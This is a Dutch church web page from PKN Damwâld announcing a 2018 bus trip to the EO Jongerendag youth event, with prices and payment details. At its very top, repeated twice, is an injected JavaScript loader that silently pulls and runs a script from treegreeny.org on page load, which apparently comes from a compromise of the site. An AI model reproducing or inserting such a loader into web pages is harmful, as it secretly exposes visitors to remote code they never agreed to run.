;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ga mee met de EO Jongerendag! - PKN Damwâld

Ga mee met de EO Jongerendag!

Gepubliceerd op: woensdag 21 maart 2018

Het grootste christelijke jongerenfeest van Nederland komt er weer aan, de EO Jongerendag! Op zaterdag 26 mei zullen For KING & COUNTRY, Matt Redman, Britt Nicole en Guvna B zorgen voor een geweldige muziek met een fantastische sfeer! Sfeer is er natuurlijk altijd met de duizenden tieners en jongeren die elk jaar weer bij elkaar komen in het GelreDome! Naast muziek is er natuurlijk ook een spreker die mag vertellen over het thema ‘WALK ON WATER’. Tijdens de pauze zijn er natuurlijk weer leuke stands, cd verkoop, sport en spel of de andere activiteiten die er te beleven zijn rondom het stadion!

Ook dit jaar gaan wij weer met een bus vanuit Damwald naar Arnhem en JIJ kunt mee! Dit is lekker gemakkelijk want wij zorgen voor de bus en voor je entree kaart op de tribune! Dat scheelt jouw reizen en kaartjes kopen! Sta je liever op het veld? Dan kan je zelf een kaartje kopen en kun je alsnog mee met de bus. De bus zal ruim op tijd aanwezig zijn in Arhem zodat je nog steeds vooraan kunt staan!

De kosten zijn: 
€ 20 entree + busreis
€ 10 alleen busreis

Opgeven?

Vul hieronder het opgaveformulier in en geef je op!
Je gegevens automatisch laten invullen? Login met je MijnKerk account!

Graag de kosten voor de kaartjes en de bus overmaken naar de volgende rekening:
NL58RABO0343378914 t.n.v. Geref. Kerk Damwoude. Graag met vermelding van EO-jongerendag en je naam.

 

Opgave kan tot 3 april 2018


    Graag de kosten voor de kaartjes en de bus overmaken naar de volgende rekening:
    NL58RABO0343378914 t.n.v. Geref. Kerk Damwoude. Graag met vermelding van EO-jongerendag en je naam.